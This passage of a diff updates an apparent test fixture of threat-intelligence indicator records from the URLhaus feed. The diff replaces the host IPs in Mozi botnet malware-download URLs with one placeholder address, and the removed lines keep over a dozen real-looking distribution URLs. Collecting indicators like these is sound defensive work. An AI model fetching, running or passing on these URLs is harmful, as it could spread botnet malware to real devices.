UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18465,18 +18465,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.228.238.118:33540/Mozi.m", + "original": "http://89.160.20.156:33540/Mozi.m", "scheme": "http", "port": 33540, - "domain": "42.228.238.118", - "full": "http://42.228.238.118:33540/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33540/Mozi.m" }, - "ip": "42.228.238.118" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693907302Z", - "original": "{\"id\":\"961165\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961165/\",\"url\":\"http://42.228.238.118:33540/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.228.238.118\",\"date_added\":\"2021-01-14 18:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027252500Z", + "original": "{\"id\":\"961165\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961165/\",\"url\":\"http://89.160.20.156:33540/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18514,18 +18514,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.238.236.187:51947/Mozi.m", + "original": "http://89.160.20.156:51947/Mozi.m", "scheme": "http", "port": 51947, - "domain": "42.238.236.187", - "full": "http://42.238.236.187:51947/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51947/Mozi.m" }, - "ip": "42.238.236.187" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693910748Z", - "original": "{\"id\":\"961166\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961166/\",\"url\":\"http://42.238.236.187:51947/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.238.236.187\",\"date_added\":\"2021-01-14 18:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027259400Z", + "original": "{\"id\":\"961166\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961166/\",\"url\":\"http://89.160.20.156:51947/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18563,18 +18563,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.123.28:36915/Mozi.m", + "original": "http://89.160.20.156:36915/Mozi.m", "scheme": "http", "port": 36915, - "domain": "186.33.123.28", - "full": "http://186.33.123.28:36915/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36915/Mozi.m" }, - "ip": "186.33.123.28" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693913764Z", - "original": "{\"id\":\"961164\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961164/\",\"url\":\"http://186.33.123.28:36915/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.123.28\",\"date_added\":\"2021-01-14 18:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027266400Z", + "original": "{\"id\":\"961164\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961164/\",\"url\":\"http://89.160.20.156:36915/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18612,18 +18612,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.116.84.95:38865/Mozi.m", + "original": "http://89.160.20.156:38865/Mozi.m", "scheme": "http", "port": 38865, - "domain": "182.116.84.95", - "full": "http://182.116.84.95:38865/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38865/Mozi.m" }, - "ip": "182.116.84.95" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693916900Z", - "original": "{\"id\":\"961163\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961163/\",\"url\":\"http://182.116.84.95:38865/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.116.84.95\",\"date_added\":\"2021-01-14 18:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027273200Z", + "original": "{\"id\":\"961163\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961163/\",\"url\":\"http://89.160.20.156:38865/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:05:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18660,18 +18660,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://103.217.123.186:55480/Mozi.m", + "original": "http://89.160.20.156:55480/Mozi.m", "scheme": "http", "port": 55480, - "domain": "103.217.123.186", - "full": "http://103.217.123.186:55480/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55480/Mozi.m" }, - "ip": "103.217.123.186" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693920457Z", - "original": "{\"id\":\"961162\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961162/\",\"url\":\"http://103.217.123.186:55480/Mozi.m\",\"url_status\":\"offline\",\"host\":\"103.217.123.186\",\"date_added\":\"2021-01-14 18:04:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027280100Z", + "original": "{\"id\":\"961162\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961162/\",\"url\":\"http://89.160.20.156:55480/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:37 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18708,18 +18708,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.136.98.81:51996/Mozi.m", + "original": "http://89.160.20.156:51996/Mozi.m", "scheme": "http", "port": 51996, - "domain": "182.136.98.81", - "full": "http://182.136.98.81:51996/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51996/Mozi.m" }, - "ip": "182.136.98.81" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693923823Z", - "original": "{\"id\":\"961161\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961161/\",\"url\":\"http://182.136.98.81:51996/Mozi.m\",\"url_status\":\"offline\",\"host\":\"182.136.98.81\",\"date_added\":\"2021-01-14 18:04:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027287100Z", + "original": "{\"id\":\"961161\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961161/\",\"url\":\"http://89.160.20.156:51996/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:36 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18756,18 +18756,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.47.250.69:36042/Mozi.m", + "original": "http://89.160.20.156:36042/Mozi.m", "scheme": "http", "port": 36042, - "domain": "125.47.250.69", - "full": "http://125.47.250.69:36042/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36042/Mozi.m" }, - "ip": "125.47.250.69" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693927530Z", - "original": "{\"id\":\"961160\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961160/\",\"url\":\"http://125.47.250.69:36042/Mozi.m\",\"url_status\":\"offline\",\"host\":\"125.47.250.69\",\"date_added\":\"2021-01-14 18:04:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027294Z", + "original": "{\"id\":\"961160\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961160/\",\"url\":\"http://89.160.20.156:36042/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:34 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18804,18 +18804,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.137.96.31:34350/Mozi.m", + "original": "http://89.160.20.156:34350/Mozi.m", "scheme": "http", "port": 34350, - "domain": "222.137.96.31", - "full": "http://222.137.96.31:34350/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34350/Mozi.m" }, - "ip": "222.137.96.31" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693930756Z", - "original": "{\"id\":\"961158\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961158/\",\"url\":\"http://222.137.96.31:34350/Mozi.m\",\"url_status\":\"offline\",\"host\":\"222.137.96.31\",\"date_added\":\"2021-01-14 18:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027300900Z", + "original": "{\"id\":\"961158\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961158/\",\"url\":\"http://89.160.20.156:34350/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18852,18 +18852,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://223.130.29.204:53587/Mozi.m", + "original": "http://89.160.20.156:53587/Mozi.m", "scheme": "http", "port": 53587, - "domain": "223.130.29.204", - "full": "http://223.130.29.204:53587/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53587/Mozi.m" }, - "ip": "223.130.29.204" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693933902Z", - "original": "{\"id\":\"961159\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961159/\",\"url\":\"http://223.130.29.204:53587/Mozi.m\",\"url_status\":\"offline\",\"host\":\"223.130.29.204\",\"date_added\":\"2021-01-14 18:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027307900Z", + "original": "{\"id\":\"961159\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961159/\",\"url\":\"http://89.160.20.156:53587/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18900,18 +18900,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.52.28.142:53444/Mozi.m", + "original": "http://89.160.20.156:53444/Mozi.m", "scheme": "http", "port": 53444, - "domain": "61.52.28.142", - "full": "http://61.52.28.142:53444/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53444/Mozi.m" }, - "ip": "61.52.28.142" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693937208Z", - "original": "{\"id\":\"961157\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961157/\",\"url\":\"http://61.52.28.142:53444/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.28.142\",\"date_added\":\"2021-01-14 18:04:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027314900Z", + "original": "{\"id\":\"961157\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961157/\",\"url\":\"http://89.160.20.156:53444/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18949,18 +18949,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://120.85.254.107:58653/Mozi.m", + "original": "http://89.160.20.156:58653/Mozi.m", "scheme": "http", "port": 58653, - "domain": "120.85.254.107", - "full": "http://120.85.254.107:58653/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58653/Mozi.m" }, - "ip": "120.85.254.107" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693940254Z", - "original": "{\"id\":\"961155\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961155/\",\"url\":\"http://120.85.254.107:58653/Mozi.m\",\"url_status\":\"online\",\"host\":\"120.85.254.107\",\"date_added\":\"2021-01-14 18:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027321800Z", + "original": "{\"id\":\"961155\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961155/\",\"url\":\"http://89.160.20.156:58653/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -18997,18 +18997,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://202.164.139.218:50579/Mozi.m", + "original": "http://89.160.20.156:50579/Mozi.m", "scheme": "http", "port": 50579, - "domain": "202.164.139.218", - "full": "http://202.164.139.218:50579/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50579/Mozi.m" }, - "ip": "202.164.139.218" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693944111Z", - "original": "{\"id\":\"961156\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961156/\",\"url\":\"http://202.164.139.218:50579/Mozi.m\",\"url_status\":\"offline\",\"host\":\"202.164.139.218\",\"date_added\":\"2021-01-14 18:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027328700Z", + "original": "{\"id\":\"961156\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961156/\",\"url\":\"http://89.160.20.156:50579/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19045,18 +19045,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://114.199.216.11:3553/Mozi.m", + "original": "http://89.160.20.156:3553/Mozi.m", "scheme": "http", "port": 3553, - "domain": "114.199.216.11", - "full": "http://114.199.216.11:3553/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:3553/Mozi.m" }, - "ip": "114.199.216.11" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693947538Z", - "original": "{\"id\":\"961152\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961152/\",\"url\":\"http://114.199.216.11:3553/Mozi.m\",\"url_status\":\"offline\",\"host\":\"114.199.216.11\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027336Z", + "original": "{\"id\":\"961152\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961152/\",\"url\":\"http://89.160.20.156:3553/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19094,18 +19094,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://112.241.208.20:35288/Mozi.a", + "original": "http://89.160.20.156:35288/Mozi.a", "scheme": "http", "port": 35288, - "domain": "112.241.208.20", - "full": "http://112.241.208.20:35288/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35288/Mozi.a" }, - "ip": "112.241.208.20" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693950754Z", - "original": "{\"id\":\"961153\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961153/\",\"url\":\"http://112.241.208.20:35288/Mozi.a\",\"url_status\":\"online\",\"host\":\"112.241.208.20\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027343Z", + "original": "{\"id\":\"961153\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961153/\",\"url\":\"http://89.160.20.156:35288/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19142,18 +19142,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.104.10:46429/Mozi.m", + "original": "http://89.160.20.156:46429/Mozi.m", "scheme": "http", "port": 46429, - "domain": "186.33.104.10", - "full": "http://186.33.104.10:46429/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46429/Mozi.m" }, - "ip": "186.33.104.10" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693956975Z", - "original": "{\"id\":\"961154\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961154/\",\"url\":\"http://186.33.104.10:46429/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.10\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027349900Z", + "original": "{\"id\":\"961154\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961154/\",\"url\":\"http://89.160.20.156:46429/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19190,18 +19190,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.96.37.179:44575/Mozi.m", + "original": "http://89.160.20.156:44575/Mozi.m", "scheme": "http", "port": 44575, - "domain": "59.96.37.179", - "full": "http://59.96.37.179:44575/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44575/Mozi.m" }, - "ip": "59.96.37.179" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693960792Z", - "original": "{\"id\":\"961151\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961151/\",\"url\":\"http://59.96.37.179:44575/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.37.179\",\"date_added\":\"2021-01-14 18:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027356800Z", + "original": "{\"id\":\"961151\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961151/\",\"url\":\"http://89.160.20.156:44575/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"false\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19239,18 +19239,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.42.236.165:43245/Mozi.m", + "original": "http://89.160.20.156:43245/Mozi.m", "scheme": "http", "port": 43245, - "domain": "125.42.236.165", - "full": "http://125.42.236.165:43245/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43245/Mozi.m" }, - "ip": "125.42.236.165" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693964199Z", - "original": "{\"id\":\"961149\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961149/\",\"url\":\"http://125.42.236.165:43245/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.42.236.165\",\"date_added\":\"2021-01-14 18:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027364Z", + "original": "{\"id\":\"961149\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961149/\",\"url\":\"http://89.160.20.156:43245/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19287,18 +19287,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.242.211.165:50444/Mozi.m", + "original": "http://89.160.20.156:50444/Mozi.m", "scheme": "http", "port": 50444, - "domain": "117.242.211.165", - "full": "http://117.242.211.165:50444/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50444/Mozi.m" }, - "ip": "117.242.211.165" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693967455Z", - "original": "{\"id\":\"961150\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961150/\",\"url\":\"http://117.242.211.165:50444/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.242.211.165\",\"date_added\":\"2021-01-14 18:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027370900Z", + "original": "{\"id\":\"961150\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961150/\",\"url\":\"http://89.160.20.156:50444/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -19335,18 +19335,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.63.134.203:51318/Mozi.m", + "original": "http://89.160.20.156:51318/Mozi.m", "scheme": "http", "port": 51318, - "domain": "115.63.134.203", - "full": "http://115.63.134.203:51318/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51318/Mozi.m" }, - "ip": "115.63.134.203" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693971202Z", - "original": "{\"id\":\"961144\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961144/\",\"url\":\"http://115.63.134.203:51318/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.63.134.203\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Gandylyan1\",\"larted\":\"true\",\"tags\":[\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027377800Z", + "original": "{\"id\":\"961144\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961144/\",\"url\":\"http://89.160.20.156:51318/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not 